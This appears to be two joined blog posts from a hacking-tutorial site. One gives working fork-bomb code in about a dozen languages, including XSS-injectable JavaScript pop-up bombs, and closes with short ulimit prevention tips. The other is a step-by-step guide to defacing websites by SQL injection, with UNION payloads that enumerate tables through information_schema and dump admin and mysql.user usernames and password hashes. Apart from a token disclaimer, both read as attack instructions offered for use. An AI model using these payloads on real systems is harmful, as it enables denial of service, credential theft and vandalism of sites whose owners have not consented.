Think about, just 5 characters long virus equivalent of a Denial-Of-Service attack on any computer system. Which aims at depriving the system off its RAM, leaving none for vital functions required to keep the systems running, hence crashing it. Fork Bomb is not just deadly to a computer but it’s also annoying.

fork bomb

What Is Fork Bomb ??

Fork Bomb (aka Rabbit Virus or Wabbit) is a Denial-Of-Service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.

How About Virus Doubling Itself !!

Virus doubling itself is a form of exponential growth.

  1. After a single iteration of the loop, two viruses are created.
  2. After another cycle, each of those two creates another two for a total of four same virus.
  3. After 10 iterations we’ll have 2^10 = 1024 virus.
  4. After 100 iterations we have 2^100 = 1.267 Nonillion, that’s a number so big you don’t even know what ‘Nonillion’ is (It’s 10^30).

Even with today’s CPUs and RAMs, being in the Tera Range (THz and Tb), the virus will probably not even complete 50 iterations before running out of memory. Remember, every iteration would hardly take a few milliseconds, so running this virus will almost definitely crash your computer.

Concept Behind Fork Bomb

Creation of a function that calls itself twice every call and doesn’t have any way to terminate itself. It will keep doubling up until you run out of system resources.

Coding Fork Bomb In Different Programming Languages

1# Fork Bomb using the Bash shell:

:(){ :|:& };:

Where,
:() means you are defining a function called :
{:|: &} means run the function : and send its output to the : function again and run that in the background.
The ; is a command separator, like &&.
: runs the function the first time.

2# Encoding in a standalone shell script as opposed to a shell function:

#!/bin/bash

./$0|./$0& #”$0″ returns the name of the shell script itself

3# Fork Bomb using the Microsoft Windows batch language:

:s
start “” %0
goto s

The same as above, but shorter:
%0|%0

4# Fork Bomb using inline shell of Perl interpreter:

perl -e “fork while fork” &

5# Fork Bomb Using Python:

import os
while 1:
os.fork()

6# Fork Bomb Using Ruby:

loop { fork { load(__FILE__) } }

7# Fork Bomb using Haskell:

import Control.Monad (forever)
import System.Posix.Process (forkProcess)

forkBomb = forever $ forkProcess forkBomb

main = forkBomb

8# Fork Bomb using Common Lisp (Clozure CL):

(loop (#_fork))

9# Fork Bomb using C:

#include <unistd.h>

int main(void)
{
while(1) fork();
}

10# Fork Bomb using Assembly:

section .text
global_start

_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start

Fork Bomb In .NET using C#:
static void Main()
{
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}

11# Fork Bomb using VB.net:

Do
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True

12# Fork Bomb using JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:

<script>
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>

Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:

<a href=”#” onload=”function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }”>XSS fork bomb</a>

Or, a more aggressive version:

<script>
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>

Prevention

As a Fork Bomb’s mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own.

  • On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit –u 30 would limit the affected user to a maximum of thirty owned processes.
  • On PAM (Pluggable Authentication Module) enabled systems, this limit can also be set in /etc/security/limits.conf
  • On FreeBSD, the system administrator can put limits in /etc/login.conf.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

We hope that HACKAGON provided knowledge about an amazing virus. so, if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.


SQL Injection is a code injection technique, used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. So, Let’s Learn How To Deface Websites Using SQL Injection With HACKAGON.

last injection

SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.

What Is Website Defacement ??

Website defacement is an attack on a website that changes the visual appearance of the site or a web page. These are typically the work of system crackers, who break into a web server and replace the hosted website with one of their own. Defacement is generally meant as a kind of electronic graffiti and, as other forms of vandalism, is also used to spread messages by politically motivated “Cyber Protesters” or “Hacktivists”.

Defacing a website simply means replacing the index.html file of a site by attacker’s own file. Now all the users who’ll open the website will see the page uploaded by the attacker.

Steps To Deface Websites Using SQL Injection:

1) Vulnerability Check:

To check a vulnerable website for SQL Injection, you need to find a page that looks like this –
http://www.website.com/news.php?id=1

Now to test if it’s vulnerable, we add a ‘ (quote) to the end of URL and that would look like –
http://www.website.com/news.php?id=1′

If the database is vulnerable, the page will spit out a MySQL error something similar to –
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”

And that means the Site is vulnerable to SQL injection but if the page loads as normal then the website is not vulnerable to SQL Injection.

2) Finding the number of columns: 

To find the number of columns in the database, we’ll use the statement ORDER BY which tells the database how to order the result. Well just incrementing the number until we get an error.

http://www.website.com/news.php?id=1 order by 1/*      <– No Error
http://www.website.com/news.php?id=1 order by 2/*      <– No Error
http://www.website.com/news.php?id=1 order by 3/*      <– No Error
http://www.website.com/news.php?id=1 order by 4/*      <– Error

We’ll get message like this: Unknown column ‘4’ in ‘order clause’ or something like that which means the database has 3 columns, as we got an error on 4.

3) Check for UNION function: 

We now are going to use the “UNION” command to find the vulnerable columns because with the union command we can select more data in one SQL statement. So we have –
http://www.website.com/news.php?id=1 union all select 1,2,3/* (As we’ve already found that the number of columns is 3 in the second step.)

If we see some numbers on the screen, i.e 1 or 2 or 3 then the UNION works.

4) Check for DataBase Version:

We now need to find the database version, name, and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
Or if these don’t work then try:
@@user
@@version
@@database

The URL would look like:
http://www.website.com/news.php?id=1 union all select 1,user(),version(),3/*

If you get an error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …” Then what we need is convert() function (I didn’t see any website article covering this problem, So I must cover it.)

i.e. http://www.website.com/news.php?id=1 union all select 1,convert(@@version using latin1),3/*

Or with hex() and unhex()

i.e. http://www.website.com/news.php?id=1 union all select 1,unhex(hex(@@version)),3/*

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.

IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

5) Obtaining Table And Column Name:

In this step, We aim to list all the table names in the database. The “table_name” goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables. But in most of the cases, we must guess table and column name.

common table names are: user/s, admin/s, member/s, etc.

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc.

URL would be http://www.website.com/news.php?id=1 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good)

We know that table admin exists. . .Now to check column names –

http://www.website.com/news.php?id=1 union all select 1, username, 3 from admin/* (if you get an error, then try the other column name)

We get username displayed on the screen, the example would be the admin, or superadmin etc. . .Now to check if column password exists –
http://www.website.com/news.php?id=1 union all select 1, password, 3 from admin/* (if you get an error, then try the other column name)

We’ll see the password on the screen in Hash or Plain-Text format, it depends on how the database is set up i.e md5 hash, mysql hash, sha1, etc.

Now we must complete query as of our need. And for that, we can use concat() function (it joins the strings).
i.e. http://www.website.com/news.php?id=1 union all select 1, concat(username,0x3a,password),3 from admin/*

Note: Here, I used 0x3a, its hex value for colon)
(The another way is to use ASCII Value for that. Example: char(58))

http://www.website.com/news.php?id=1 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get displayed username: password on screen, i.e admin: admin or admin: HACKAGON

When you have this, you can login like admin or some superuser. If can’t then guess the right table name, you can always try mysql.user (Default). It has user password columns, So the URL would be
http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6) Incase of MySQL 5:

Uptil step 5 is for MySQL version < 5 (i.e 4.1.33, 4.1.12, etc.) But for MySQL 5 we need information_schema. It holds all tables and columns in the database. To get tables, we use table_name and information_schema.tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note: Here, I put 0,1 (Get 1’s result starting from the 0th)

Now to view the second table, we’ll change limit 0,1 to limit 1,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

The second table is displayed. Now for the third table, we put limit 2,1
i.e. http://www.website.com/news.php?id=1 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing the limit until you get some useful table like db_admin, poll_user, auth, auth_user, etc.

To get the column names, the method will be the same. Where we use column_name and information_schema.columns.

The method will be as same as above. So the example would be –

http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed. The second one (we change limit 0,1 to limit 1,1)
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing the limit until you get something like username, user, login, password, pass, passwd, etc.

If you wanna display column names for specific table use this query (where clause). Let’s say that we found table users.
i.e. http://www.website.com/news.php?id=1 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

Now we’ll get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note: This wouldn’t work if the magic quotes are ON.

Let’s say that we found columns user, pass, and email. Now complete the query to put them all together. For that we use concat(), As I used it earlier.
i.e. http://www.website.com/news.php?id=1 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

We’ll get here user:pass:email from table users. Example: admin:hash:xyz@abc.com

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still face any kind of problem.